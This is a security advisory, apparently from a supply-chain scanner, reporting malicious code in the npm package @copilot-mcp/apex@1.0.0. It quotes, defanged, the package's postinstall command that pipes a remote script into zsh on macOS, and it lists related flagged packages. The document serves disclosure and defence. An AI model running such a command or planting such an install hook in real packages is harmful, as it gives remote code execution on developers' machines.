@copilot-mcp/apex@1.0.0
Malicious code in @copilot-mcp/apex (npm)
T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1105 · Ingress Tool Transfer
Analysis
The postinstall hook (install.cjs) downloads a binary from GitHub releases for Linux/Windows, but on macOS it executes a remote shell script via 'curl -fsSL hxxps://update[.]apex-arena-router[.]com/loader[.]sh | zsh' — a remote code execution at install time from a non-standard host (update[.]apex-arena-router[.]com). The package also downloads a binary from github[.]com/Apex-Foundation/copilot/releases into a local bin/ directory. The macOS-specific curl|sh pipeline runs unconditionally on Darwin systems during npm install.
- analyzed by
- Leitwacht
- first seen
- Jul 22, 2026, 08:04 AM
- analyzed
- Jul 22, 2026, 08:05 AM
Related advisories
- vectormark@1.0.0
- vite-config-svg@1.1.7
- crypto-checkout-api@1.0.0
- wallet-analytics@1.4.8
- luluking2@0.0.1
- luluking1@0.0.1
- @apexfnd/apex@1.0.1
- poly-custom-api@5.3.1
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.